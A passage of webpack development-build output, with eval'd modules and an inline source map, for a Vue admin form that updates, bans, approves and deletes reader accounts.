_this2.readerForm.is_approved = \"APPROVED\";\n\n _this2.$store.dispatch('admin-reader/editReader', _this2.readerForm).then(function (_ref) {\n var success = _ref.success,\n message = _ref.message;\n\n if (success) {\n Object(_helpers__WEBPACK_IMPORTED_MODULE_3__[\"swalSuccess\"])(\"Reader Updated\").then(function () {\n _this2.isUpdating = false;\n });\n }\n });\n }\n });\n\n case 1:\n case \"end\":\n return _context.stop();\n }\n }\n }, _callee);\n }))();\n },\n cancelUpdate: function cancelUpdate() {\n var _this3 = this;\n\n this.readerForm.keys().forEach(function (key) {\n _this3.readerForm[key] = _this3.user[key];\n });\n this.isUpdating = false;\n },\n removeAccount: function removeAccount() {\n var _this4 = this;\n\n sweetalert2__WEBPACK_IMPORTED_MODULE_4___default.a.fire({\n title: 'Are you sure?',\n text: \"You won't be able to revert this!\",\n icon: 'warning',\n showCancelButton: true,\n confirmButtonColor: '#3085d6',\n cancelButtonColor: '#d33',\n confirmButtonText: 'Yes, delete it!'\n }).then(function (result) {\n console.log(result);\n\n if (result.value) {\n _this4.$store.dispatch('admin-reader/removeReader', _this4.readerForm.id).then(function (_ref2) {\n var success = _ref2.success,\n message = _ref2.message;\n\n if (success) {\n Object(_helpers__WEBPACK_IMPORTED_MODULE_3__[\"swalSuccess\"])(\"Reader removed!\").then(function () {\n _this4.$router.push({\n name: 'admin.readers'\n });\n });\n }\n });\n }\n });\n },\n goBack: function goBack() {\n this.$router.back();\n }\n }\n});//# sourceURL=[module]\n//# sourceMappingURL=data:application/json;charset=utf-8;base64,{"version":3,"sources":["webpack:///resources/js/pages/admin/reader/reader-form.vue?c840"],"names":[],"mappings":";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAkQA;AACA;AACA;AACA;AACA;AACA;AAEA;AACA,oBADA;AAGA,UAHA,sBAGA;AACA;AAAA;AAAA;AACA,GALA;AAOA;AACA,4EADA;AAEA;AAFA,GAPA;AAYA;AAAA;AACA,uBADA;AAEA,iCAFA;AAGA,wBAHA;AAIA,yBAJA;AAKA,0BALA;AAMA,gBACA;AACA,aADA;AAEA;AAFA,OADA,EAKA;AACA,aADA;AAEA;AAFA,OALA,EASA;AACA,aADA;AAEA;AAFA,OATA;AANA;AAAA,GAZA;AAkCA;AACA,qBADA;AAEA,yCAFA;AAGA,iDAHA;AAIA,uCAJA;AAKA;AALA,IAlCA;AA0CA,aA1CA,yBA0CA;AAAA;;AACA;AACA;AACA;AACA;AACA;AACA;AACA;AACA,KANA;AAOA;AACA;AACA,KAFA;AAGA,GAtDA;AAwDA;AACA,UADA,oBACA;AAAA;;AAAA;AAAA;AAAA;AAAA;AAAA;AACA;AACA,wCADA;AAEA,6DAFA;AAGA,iCAHA;AAIA,wCAJA;AAKA,+CALA;AAMA,2CANA;AAOA;AAPA,mBAQA,IARA,CAQA;AACA;;AACA;AACA;AACA,gFACA,gCADA,KAEA,2DACA;AAGA;AACA,iFACA,8BADA,KAEA,8DACA;AAEA,oFACA,2CADA,KAEA,+DACA;;AAEA;AAAA;AAAA;;AACA;AACA;AACA;AACA,yBAFA;AAGA;AACA,qBANA;AAOA;AACA,iBArCA;;AADA;AAAA;AAAA;AAAA;AAAA;AAAA;AAAA;AAuCA,KAxCA;AA0CA,gBA1CA,0BA0CA;AAAA;;AACA;AACA;AACA,OAFA;AAGA;AACA,KA/CA;AAiDA,iBAjDA,2BAiDA;AAAA;;AACA;AACA,8BADA;AAEA,iDAFA;AAGA,uBAHA;AAIA,8BAJA;AAKA,qCALA;AAMA,iCANA;AAOA;AAPA,SAQA,IARA,CAQA;AACA;;AACA;AACA;AAAA;AAAA;;AACA;AACA;AACA;AAAA;AAAA;AACA,eAFA;AAGA;AACA,WANA;AAOA;AACA,OAnBA;AAoBA,KAtEA;AAwEA,UAxEA,oBAwEA;AACA;AACA;AA1EA;AAxDA","file":"./node_modules/babel-loader/lib/index.js?!./node_modules/vue-loader/lib/index.js?!./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js&.js","sourcesContent":["<template>\r\n  <card class=\"py-3 m-4\">\r\n    <div class=\"row\">\r\n      <div class=\"col-md-8\">\r\n        <h4 class=\"mb-3\">Update Reader Profile</h4>\r\n        <p class=\"mb-5\">Change personal information here.</p>\r\n      </div>\r\n      <div class=\"col-md-4 text-right\">\r\n        <button class=\"btn btn-danger btn-lg\" @click=\"goBack\">Back</button>\r\n      </div>\r\n    </div>\r\n    <hr>\r\n    \r\n    <h5 class=\"mb-3\">Account Information</h5>\r\n    <form @submit.prevent=\"update\" @keydown=\"readerForm.onKeydown($event)\">\r\n      <div class=\"row\">\r\n        <div class=\"col-md-6\">\r\n          <!-- Username -->\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('username') }}</label>\r\n            <input  v-model=\"readerForm.username\" :class=\"{ 'is-invalid': readerForm.errors.has('username') }\" class=\"form-control\" type=\"text\" name=\"username\" :readonly=\"!isUpdating\">\r\n            <has-error :form=\"readerForm\" field=\"username\" />\r\n          </div>\r\n\r\n          <!-- First Name -->\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('First Name') }}</label>\r\n            <input  v-model=\"readerForm.firstName\" :class=\"{ 'is-invalid': readerForm.errors.has('firstName') }\" class=\"form-control\" type=\"text\" name=\"firstName\" :readonly=\"!isUpdating\">\r\n            <has-error :form=\"readerForm\" field=\"firstName\" />\r\n          </div>\r\n\r\n          <!-- Last Name -->\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('Last Name') }}</label>\r\n            <input  v-model=\"readerForm.lastName\" :class=\"{ 'is-invalid': readerForm.errors.has('lastName') }\" class=\"form-control\" type=\"text\" name=\"lastName\" :readonly=\"!isUpdating\">\r\n            <has-error :form=\"readerForm\" field=\"lastName\" />\r\n          </div>\r\n\r\n        </div>\r\n        \r\n        <div class=\"col-md-6\">\r\n      \r\n          <!-- Email -->\r\n          <div class=\"form-group col-md-11 mx-auto\">\r\n            <label>{{ $t('email') }}</label>\r\n            <input  v-model=\"readerForm.email\" :class=\"{ 'is-invalid': readerForm.errors.has('email') }\" class=\"form-control\" type=\"text\" name=\"email\" :readonly=\"!isUpdating\">\r\n            <has-error :form=\"readerForm\" field=\"email\" />\r\n          </div>\r\n\r\n          <!-- Phone Number -->\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('Phone Number') }}</label>\r\n            <input  v-model=\"readerForm.phone_number\" :class=\"{ 'is-invalid': readerForm.errors.has('phone_number') }\" class=\"form-control\" type=\"text\" name=\"phone_number\" :readonly=\"!isUpdating\">\r\n            <has-error :form=\"readerForm\" field=\"phone_number\" />\r\n          </div>\r\n\r\n          <div class=\"form-group col-md-11 mx-auto ml-2\">\r\n            <label>Banned?</label>\r\n            <InputSwitch v-model=\"sync_banned\" class=\"mr-2\" :disabled=\"!isUpdating\" />\r\n      \r\n            <label>Visible?</label>\r\n            <InputSwitch v-model=\"sync_visible\" class=\"mr-2\" :disabled=\"!isUpdating\" />\r\n    \r\n            <label>Approved?</label>\r\n            <InputSwitch v-model=\"sync_approved\"  class=\"mr-2\" :disabled=\"!isUpdating\" />\r\n          </div>\r\n\r\n        </div>\r\n\r\n        <!-- Submit Button -->\r\n        <div class=\"form-group row  col-md-4 mx-auto mt-3\">\r\n          <div class=\"col-md-6 px-0 pr-lg-1\"  v-if=\"isUpdating\">\r\n            <!-- Bac Button -->\r\n            <button type=\"button\" class=\"btn btn-secondary w-100\" @click.prevent=\"cancelUpdate()\"  >\r\n            <!-- <v-button :loading=\"form.busy\"> -->\r\n            Cancel\r\n            </button>\r\n          </div>\r\n\r\n          <div class=\"col-md-6 px-0 pr-lg-1\"  v-else>\r\n            <!-- Bac Button -->\r\n            <button type=\"button\" class=\"btn btn-danger w-100\" @click.prevent=\"removeAccount()\"  >\r\n            <!-- <v-button :loading=\"form.busy\"> -->\r\n            Remove Account\r\n            </button>\r\n          </div>\r\n          \r\n          <div class=\"col-md-6 px-0 pl-lg-1 ml-md-auto\">\r\n            <!-- Update Button -->\r\n            <button class=\"btn btn-primary w-100\" @click.prevent=\"isUpdating = true\"  v-if=\"!isUpdating\">\r\n              {{ $t('update') }}\r\n            </button>\r\n            <v-button class=\"btn btn-primary w-100\"  v-else>\r\n              Confirm\r\n            </v-button>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </form>\r\n\r\n    <hr class=\" mt-5\">\r\n    <h5 class=\"mb-3\">Additional Information</h5>\r\n    <form @submit.prevent=\"updateAdditional\" @keydown=\"additionalForm.onKeydown($event)\">\r\n      <div class=\"row\">\r\n        <div class=\"col-md-6\">   \r\n          \r\n          <div class=\"form-group col-md-11 mx-auto\">\r\n            <label>{{ $t('Address') }}</label>\r\n            <input  v-model=\"additionalForm.address\" :class=\"{ 'is-invalid': additionalForm.errors.has('address') }\" class=\"form-control\" type=\"text\" name=\"address\" :readonly=\"!isAdditionalUpdating\">\r\n            <has-error :form=\"additionalForm\" field=\"address1\" />\r\n          </div>\r\n\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('State/Province') }}</label>\r\n            <input  v-model=\"additionalForm.state\" :class=\"{ 'is-invalid': additionalForm.errors.has('state') }\" class=\"form-control\" type=\"text\" name=\"state\" :readonly=\"!isAdditionalUpdating\">\r\n            <has-error :form=\"additionalForm\" field=\"state\" />\r\n          </div>\r\n\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('ZIP/Postal Code') }}</label>\r\n            <input  v-model=\"additionalForm.zip\" :class=\"{ 'is-invalid': additionalForm.errors.has('zip') }\" class=\"form-control\" type=\"text\" name=\"zip\" :readonly=\"!isAdditionalUpdating\">\r\n            <has-error :form=\"additionalForm\" field=\"zip\" />\r\n          </div>\r\n\r\n        </div>\r\n        \r\n        <div class=\"col-md-6\">\r\n\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('Country') }}</label>\r\n            <input  v-model=\"additionalForm.country\" :class=\"{ 'is-invalid': additionalForm.errors.has('country') }\" class=\"form-control\" type=\"text\" name=\"country\" :readonly=\"!isAdditionalUpdating\">\r\n            <has-error :form=\"additionalForm\" field=\"country\" />\r\n          </div>\r\n\r\n          <div class=\"form-group col-md-11 mx-auto\">\r\n            <label>{{ $t('Birthdate') }}</label>\r\n            <birth-datepicker  v-model=\"additionalForm.birthdate\" :class=\"{ 'is-invalid': additionalForm.errors.has('birthdate') }\" class=\"form-control\" name=\"birthdate\" :disabled=\"!isAdditionalUpdating\" />\r\n            <has-error :form=\"additionalform\" field=\"birthdate\" />\r\n          </div>\r\n\r\n          <div class=\"form-group col-md-11 mx-auto\">\r\n            <label>Gender</label>\r\n            <select id=\"gender\" class=\"form-control\"  v-model=\"additionalForm.gender\" required :disabled=\"!isAdditionalUpdating\">\r\n              <option :value=\"gender.id\"\r\n                v-for=\"(gender) in genders\"\r\n                :key=\"gender.id\">\r\n                {{ gender.name }}\r\n              </option>\r\n            </select>\r\n            <has-error :form=\"additionalForm\" field=\"gender\" />\r\n          </div>     \r\n        \r\n        </div>\r\n\r\n        <!-- Submit Button -->\r\n        <div class=\"form-group row  col-md-4 mx-auto mt-3\" v-if=\"isAdditionalUpdating\">\r\n          <div class=\"col-md-6 px-0 pr-lg-1\"  >\r\n            <!-- Bac Button -->\r\n            <button type=\"button\" class=\"btn btn-secondary w-100\" @click.prevent=\"cancelUpdate()\"  >\r\n            <!-- <v-button :loading=\"form.busy\"> -->\r\n            Cancel\r\n            </button>\r\n          </div>\r\n\r\n          <div class=\"col-md-6 px-0 pl-lg-1 ml-md-auto\">\r\n            <v-button class=\"btn btn-primary w-100\" >\r\n              Confirm\r\n            </v-button>\r\n          </div>\r\n        </div>\r\n        \r\n        <div class=\"form-group row  col-md-4 mx-auto mt-3\"  v-else>\r\n          <div class=\"col-md-6 px-0 pr-lg-1\"  >\r\n            <!-- Bac Button -->\r\n            <button type=\"button\" class=\"btn btn-secondary w-100\" @click.prevent=\"cancelUpdate()\"  >\r\n            <!-- <v-button :loading=\"form.busy\"> -->\r\n            Cancel\r\n            </button>\r\n          </div>\r\n\r\n          <div class=\"col-md-6 px-0 pl-lg-1 ml-md-auto\">\r\n            <v-button class=\"btn btn-primary w-100\" >\r\n              Confirm\r\n            </v-button>\r\n          </div>\r\n        </div>\r\n\r\n      </div>\r\n    </form>\r\n\r\n    <hr class=\" mt-5\">\r\n    <h5 class=\"mb-3\">Update Password</h5>\r\n    <form @submit.prevent=\"update\" @keydown=\"readerForm.onKeydown($event)\">\r\n      <div class=\"row\">\r\n        <div class=\"col-md-6\">   \r\n          \r\n          <!-- Password -->\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('password') }}</label>\r\n            <input  v-model=\"readerForm.password\" :class=\"{ 'is-invalid': readerForm.errors.has('password') }\" class=\"form-control\" type=\"password\" name=\"password\" :readonly=\"!isUpdating\">\r\n            <has-error :form=\"readerForm\" field=\"password\" />\r\n          </div>\r\n\r\n          <!-- Confirm Password -->\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('Confirm Password') }}</label>\r\n            <input :class=\"{ 'is-invalid': readerForm.errors.has('confirm-password') }\" class=\"form-control\" type=\"password\" name=\"confirmPassword\" :readonly=\"!isUpdating\">\r\n            <has-error :form=\"readerForm\" field=\"confirmPassword\" />\r\n          </div>\r\n\r\n        </div>\r\n        \r\n        <div class=\"col-md-6\">\r\n\r\n          <div class=\"form-group col-md-11 mx-auto mx-auto  \">\r\n            <label>{{ $t('Current Password') }}</label>\r\n            <input :class=\"{ 'is-invalid': readerForm.errors.has('current-password') }\" class=\"form-control\" type=\"password\" name=\"currentPassword\" :readonly=\"!isUpdating\">\r\n            <has-error :form=\"readerForm\" field=\"currentPassword\" />\r\n          </div>\r\n        \r\n        </div>\r\n\r\n        <!-- Submit Button -->\r\n        <div class=\"form-group row col-md-4 mx-auto mt-3\">\r\n          <div class=\"col-md-6 px-0 pr-lg-1\"  v-if=\"isUpdating\">\r\n            <!-- Bac Button -->\r\n            <button type=\"button\" class=\"btn btn-secondary w-100\" @click.prevent=\"cancelUpdate()\"  >\r\n            <!-- <v-button :loading=\"form.busy\"> -->\r\n            Cancel\r\n            </button>\r\n          </div>\r\n\r\n          <div class=\"col-md-6 px-0 pr-lg-1\"  v-else>\r\n            <!-- Bac Button -->\r\n            <button type=\"button\" class=\"btn btn-danger w-100\" @click.prevent=\"removeAccount()\"  >\r\n            <!-- <v-button :loading=\"form.busy\"> -->\r\n            Remove Account\r\n            </button>\r\n          </div>\r\n          \r\n          <div class=\"col-md-6 px-0 pl-lg-1 ml-md-auto\">\r\n            <!-- Update Button -->\r\n            <button class=\"btn btn-primary w-100\" @click.prevent=\"isUpdating = true\"  v-if=\"!isUpdating\">\r\n            {{ $t('update') }}\r\n            </button>\r\n            <v-button class=\"btn btn-primary w-100\"  v-else>\r\n            Confirm\r\n            </v-button>\r\n          </div>\r\n\r\n        </div>\r\n      </div>\r\n    </form>\r\n\r\n  </card>\r\n</template>\r\n\r\n<script>\r\nimport Form from 'vform'\r\nimport { mapGetters } from 'vuex'\r\nimport { swalOops, swalSuccess } from \"~/helpers\"\r\nimport Swal from 'sweetalert2';\r\nimport InputSwitch from 'primevue/inputswitch';\r\nimport birthDatepicker from 'vue-birth-datepicker/src/birth-datepicker';\r\n\r\nexport default {\r\n  scrollToTop: false,\r\n\r\n  metaInfo () {\r\n    return { title: this.$t('settings') }\r\n  },\r\n\r\n  components: {\r\n    InputSwitch,\r\n    birthDatepicker\r\n  },\r\n\r\n  data: () => ({\r\n    isUpdating: false,\r\n    isAdditionalUpdating: false,\r\n    sync_banned: false,\r\n    sync_visible: false,\r\n    sync_approved: false,\r\n    genders: [\r\n      {\r\n        id: 0,\r\n        name: 'Male'\r\n      },\r\n      {\r\n        id: 1,\r\n        name: 'Female'\r\n      },\r\n      {\r\n        id: 2,\r\n        name: 'Other'\r\n      }\r\n    ]\r\n  }),\r\n\r\n  computed: mapGetters({\r\n    user: 'auth/user',\r\n    readerForm: 'admin-reader/readerForm',\r\n    additionalForm: 'admin-reader/additionalForm',\r\n    is_banned: 'admin-reader/is_banned',\r\n    visible: 'admin-reader/visible',\r\n  }),\r\n\r\n  beforeMount () {\r\n    let id = this.$route.params.id\r\n    this.$store.dispatch(\"admin-reader/viewReader\", id).then(()=>{\r\n      console.log(this.readerForm.is_banned)\r\n      this.sync_banned = this.readerForm.is_banned === 1 ? true : false\r\n      console.log(this.sync_banned)\r\n      this.sync_visible = this.readerForm.visible === 1 ? true : false\r\n      this.sync_approved = this.readerForm.is_approved === \"APPROVED\" ? true : false\r\n    });\r\n    this.$store.dispatch(\"admin-reader/viewAdditional\", id).then(()=>{\r\n      console.log(this.additionalForm);\r\n    });\r\n  },\r\n\r\n  methods: {\r\n    async update () {\r\n      Swal.fire({\r\n        title: 'Are you sure?',\r\n        text: \"You are about to update this reader\",\r\n        icon: 'warning',\r\n        showCancelButton: true,\r\n        confirmButtonColor: '#3085d6',\r\n        cancelButtonColor: '#d33',\r\n        confirmButtonText: 'Confirm'\r\n      }).then((result) => {\r\n        console.log(result.value);\r\n        if (result.value) {\r\n          console.log(this.sync_banned);\r\n          if (this.sync_banned == 0 || this.sync_banned == false)\r\n            this.readerForm.is_banned = 0;\r\n          else if (this.sync_banned == 1 || this.sync_banned == true)\r\n            this.readerForm.is_banned = 1;\r\n          \r\n\r\n          console.log(this.visible);\r\n          if (this.sync_visible == 1 || this.sync_visible == true)\r\n            this.readerForm.visible = 1;\r\n          else if (this.sync_visible == 0 || this.sync_visible == false)\r\n            this.visible = 0;\r\n          \r\n          if (this.sync_approved == 0 || this.sync_approved == false)\r\n            this.readerForm.is_approved = \"REJECTED\";\r\n          else if (this.sync_approved == 1 || this.sync_approved == true)\r\n            this.readerForm.is_approved = \"APPROVED\";\r\n          \r\n          this.$store.dispatch('admin-reader/editReader', this.readerForm).then(({success, message}) => {\r\n          if (success) {\r\n            swalSuccess(\"Reader Updated\").then(() =>{\r\n               this.isUpdating = false;\r\n            })\r\n          }\r\n        })\r\n        }\r\n      })\r\n    },\r\n\r\n    cancelUpdate() {\r\n      this.readerForm.keys().forEach(key => {\r\n        this.readerForm[key] = this.user[key]\r\n      })\r\n      this.isUpdating = false;\r\n    },\r\n\r\n    removeAccount(){\r\n      Swal.fire({\r\n        title: 'Are you sure?',\r\n        text: \"You won't be able to revert this!\",\r\n        icon: 'warning',\r\n        showCancelButton: true,\r\n        confirmButtonColor: '#3085d6',\r\n        cancelButtonColor: '#d33',\r\n        confirmButtonText: 'Yes, delete it!'\r\n      }).then((result) => {\r\n        console.log(result);\r\n        if (result.value) {\r\n          this.$store.dispatch('admin-reader/removeReader', this.readerForm.id).then(({success, message}) => {\r\n          if (success) {\r\n            swalSuccess(\"Reader removed!\").then(() =>{\r\n              this.$router.push({ name: 'admin.readers' })\r\n            })\r\n          }\r\n        })\r\n        }\r\n      })\r\n    },   \r\n\r\n    goBack(){\r\n      this.$router.back()\r\n    }\r\n  }\r\n}\r\n</script>\r\n"],"sourceRoot":""}\n//# sourceURL=webpack-internal:///./node_modules/babel-loader/lib/index.js?!./node_modules/vue-loader/lib/index.js?!./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js&\n");
/***/ }),
/***/ "./node_modules/vue-loader/lib/loaders/templateLoader.js?!./node_modules/vue-loader/lib/index.js?!./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b&":
/*!**********************************************************************************************************************************************************************************************************************!*\
!*** ./node_modules/vue-loader/lib/loaders/templateLoader.js??vue-loader-options!./node_modules/vue-loader/lib??vue-loader-options!./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b& ***!
\**********************************************************************************************************************************************************************************************************************/
/*! exports provided: render, staticRenderFns */
/***/ (function(module, __webpack_exports__, __webpack_require__) {
"use strict";
eval("__webpack_require__.r(__webpack_exports__);\n/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, \"render\", function() { return render; });\n/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, \"staticRenderFns\", function() { return staticRenderFns; });\nvar render = function() {\n var _vm = this\n var _h = _vm.$createElement\n var _c = _vm._self._c || _h\n return _c(\"card\", { staticClass: \"py-3 m-4\" }, [\n _c(\"div\", { staticClass: \"row\" }, [\n _c(\"div\", { staticClass: \"col-md-8\" }, [\n _c(\"h4\", { staticClass: \"mb-3\" }, [_vm._v(\"Update Reader Profile\")]),\n _vm._v(\" \"),\n _c(\"p\", { staticClass: \"mb-5\" }, [\n _vm._v(\"Change personal information here.\")\n ])\n ]),\n _vm._v(\" \"),\n _c(\"div\", { staticClass: \"col-md-4 text-right\" }, [\n _c(\n \"button\",\n { staticClass: \"btn btn-danger btn-lg\", on: { click: _vm.goBack } },\n [_vm._v(\"Back\")]\n )\n ])\n ]),\n _vm._v(\" \"),\n _c(\"hr\"),\n _vm._v(\" \"),\n _c(\"h5\", { staticClass: \"mb-3\" }, [_vm._v(\"Account Information\")]),\n _vm._v(\" \"),\n _c(\n \"form\",\n {\n on: {\n submit: function($event) {\n $event.preventDefault()\n return _vm.update($event)\n },\n keydown: function($event) {\n return _vm.readerForm.onKeydown($event)\n }\n }\n },\n [\n _c(\"div\", { staticClass: \"row\" }, [\n _c(\"div\", { staticClass: \"col-md-6\" }, [\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto mx-auto \" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"username\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n directives: [\n {\n name: \"model\",\n rawName: \"v-model\",\n value: _vm.readerForm.username,\n expression: \"readerForm.username\"\n }\n ],\n staticClass: \"form-control\",\n class: {\n \"is-invalid\": _vm.readerForm.errors.has(\"username\")\n },\n attrs: {\n type: \"text\",\n name: \"username\",\n readonly: !_vm.isUpdating\n },\n domProps: { value: _vm.readerForm.username },\n on: {\n input: function($event) {\n if ($event.target.composing) {\n return\n }\n _vm.$set(_vm.readerForm, \"username\", $event.target.value)\n }\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.readerForm, field: \"username\" }\n })\n ],\n 1\n ),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto mx-auto \" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"First Name\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n directives: [\n {\n name: \"model\",\n rawName: \"v-model\",\n value: _vm.readerForm.firstName,\n expression: \"readerForm.firstName\"\n }\n ],\n staticClass: \"form-control\",\n class: {\n \"is-invalid\": _vm.readerForm.errors.has(\"firstName\")\n },\n attrs: {\n type: \"text\",\n name: \"firstName\",\n readonly: !_vm.isUpdating\n },\n domProps: { value: _vm.readerForm.firstName },\n on: {\n input: function($event) {\n if ($event.target.composing) {\n return\n }\n _vm.$set(_vm.readerForm, \"firstName\", $event.target.value)\n }\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.readerForm, field: \"firstName\" }\n })\n ],\n 1\n ),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto mx-auto \" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Last Name\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n directives: [\n {\n name: \"model\",\n rawName: \"v-model\",\n value: _vm.readerForm.lastName,\n expression: \"readerForm.lastName\"\n }\n ],\n staticClass: \"form-control\",\n class: {\n \"is-invalid\": _vm.readerForm.errors.has(\"lastName\")\n },\n attrs: {\n type: \"text\",\n name: \"lastName\",\n readonly: !_vm.isUpdating\n },\n domProps: { value: _vm.readerForm.lastName },\n on: {\n input: function($event) {\n if ($event.target.composing) {\n return\n }\n _vm.$set(_vm.readerForm, \"lastName\", $event.target.value)\n }\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.readerForm, field: \"lastName\" }\n })\n ],\n 1\n )\n ]),\n _vm._v(\" \"),\n _c(\"div\", { staticClass: \"col-md-6\" }, [\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto\" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"email\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n directives: [\n {\n name: \"model\",\n rawName: \"v-model\",\n value: _vm.readerForm.email,\n expression: \"readerForm.email\"\n }\n ],\n staticClass: \"form-control\",\n class: { \"is-invalid\": _vm.readerForm.errors.has(\"email\") },\n attrs: {\n type: \"text\",\n name: \"email\",\n readonly: !_vm.isUpdating\n },\n domProps: { value: _vm.readerForm.email },\n on: {\n input: function($event) {\n if ($event.target.composing) {\n return\n }\n _vm.$set(_vm.readerForm, \"email\", $event.target.value)\n }\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.readerForm, field: \"email\" }\n })\n ],\n 1\n ),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto mx-auto \" },\n [\n _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Phone Number\")))]),\n _vm._v(\" \"),\n _c(\"input\", {\n directives: [\n {\n name: \"model\",\n rawName: \"v-model\",\n value: _vm.readerForm.phone_number,\n expression: \"readerForm.phone_number\"\n }\n ],\n staticClass: \"form-control\",\n class: {\n \"is-invalid\": _vm.readerForm.errors.has(\"phone_number\")\n },\n attrs: {\n type: \"text\",\n name: \"phone_number\",\n readonly: !_vm.isUpdating\n },\n domProps: { value: _vm.readerForm.phone_number },\n on: {\n input: function($event) {\n if ($event.target.composing) {\n return\n }\n _vm.$set(\n _vm.readerForm,\n \"phone_number\",\n $event.target.value\n )\n }\n }\n }),\n _vm._v(\" \"),\n _c(\"has-error\", {\n attrs: { form: _vm.readerForm, field: \"phone_number\" }\n })\n ],\n 1\n ),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"form-group col-md-11 mx-auto ml-2\" },\n [\n _c(\"label\", [_vm._v(\"Banned?\")]),\n _vm._v(\" \"),\n _c(\"InputSwitch\", {\n staticClass: \"mr-2\",\n attrs: { disabled: !_vm.isUpdating },\n model: {\n value: _vm.sync_banned,\n callback: function($$v) {\n _vm.sync_banned = $$v\n },\n expression: \"sync_banned\"\n }\n }),\n _vm._v(\" \"),\n _c(\"label\", [_vm._v(\"Visible?\")]),\n _vm._v(\" \"),\n _c(\"InputSwitch\", {\n staticClass: \"mr-2\",\n attrs: { disabled: !_vm.isUpdating },\n model: {\n value: _vm.sync_visible,\n callback: function($$v) {\n _vm.sync_visible = $$v\n },\n expression: \"sync_visible\"\n }\n }),\n _vm._v(\" \"),\n _c(\"label\", [_vm._v(\"Approved?\")]),\n _vm._v(\" \"),\n _c(\"InputSwitch\", {\n staticClass: \"mr-2\",\n attrs: { disabled: !_vm.isUpdating },\n model: {\n value: _vm.sync_approved,\n callback: function($$v) {\n _vm.sync_approved = $$v\n },\n expression: \"sync_approved\"\n }\n })\n ],\n 1\n )\n ]),\n _vm._v(\" \"),\n _c(\"div\", { staticClass: \"form-group row col-md-4 mx-auto mt-3\" }, [\n _vm.isUpdating\n ? _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n _c(\n \"button\",\n {\n staticClass: \"btn btn-secondary w-100\",\n attrs: { type: \"button\" },\n on: {\n click: function($event) {\n $event.preventDefault()\n return _vm.cancelUpdate()\n }\n }\n },\n [_vm._v(\"\\n Cancel\\n \")]\n )\n ])\n : _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n _c(\n \"button\",\n {\n staticClass: \"btn btn-danger w-100\",\n attrs: { type: \"button\" },\n on: {\n click: function($event) {\n $event.preventDefault()\n return _vm.removeAccount()\n }\n }\n },\n [_vm._v(\"\\n Remove Account\\n \")]\n )\n ]),\n _vm._v(\" \"),\n _c(\n \"div\",\n { staticClass: \"col-md-6 px-0 pl-lg-1 ml-md-auto\" },\n [\n !_vm.isUpdating\n ? _c(\n \"button\",\n {\n staticClass: \"btn btn-primary w-100\",\n on: {\n click: function($event) {\n $event.preventDefault()\n _vm.isUpdating = true\n }\n }\n },\n [\n _vm._v(\n \"\\n \" +\n _vm._s(_vm.$t(\"update\")) +\n \"\\n \"\n )\n ]\n )\n : _c(\"v-button\", { staticClass: \"btn btn-primary w-100\" }, [\n _vm._v(\"\\n Confirm\\n \")\n ])\n ],\n 1\n )\n ])\n ])\n ]\n ),\n _vm._v(\" \"),\n _c(\"hr\", { staticClass: \" mt-5\" }),\n _vm._v(\" \"),\n _c(\"h5\", { staticClass: \"mb-3\" }, [_vm._v(\"Additional Information\")]),\n _vm._v(\" \"),\n _c(\n \"form\",\n {\n on: {\n submit: function($event) {\n $event.preventDefault()\n return _vm.updateAdditional($event)\n },\n keydown: function($event) {\n return _vm.additionalForm.onKeydown($event)\n }\n }\n },\n [\n _c(\"div\", { staticClass: \"row\" }, [\n _c(\"div\", { staticClass: \"col-md-6\" }, [\n _c(\n 